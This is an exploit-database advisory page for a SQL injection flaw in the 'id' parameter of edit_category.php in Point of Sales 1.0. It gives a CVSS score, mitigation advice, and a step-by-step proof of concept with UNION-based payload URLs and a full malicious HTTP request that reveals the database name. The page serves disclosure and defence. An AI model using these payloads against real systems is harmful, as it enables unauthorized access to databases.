header-logo
Suggest Exploit
vendor:
Point of Sales
by:
Ankita Pal
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Point of Sales
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 + xampp v3.2.4
2020

Point of Sales 1.0 – SQL Injection

The Point of Sales 1.0 software is vulnerable to SQL Injection. By manipulating the 'id' parameter in the 'edit_category.php' page, an attacker can inject malicious SQL queries and retrieve sensitive information from the database. The vulnerability allows unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. Additionally, the principle of least privilege should be followed to limit the privileges of the database user used by the application.
Source

Exploit-DB raw data:

#Exploit Title: Point of Sales 1.0 - SQL Injection
#Date: 2020-10-22
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4


Proof of Concept:::

Step 1:	Open the URL http://localhost:8081/pos/edit_category.php?id=1

Step 2:	Change the URL http://localhost:8081/pos/edit_category.php?id=1'

Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+

Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+

Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+


Malicious Request:::

GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1

Gives database name *sourcecodester_posdb*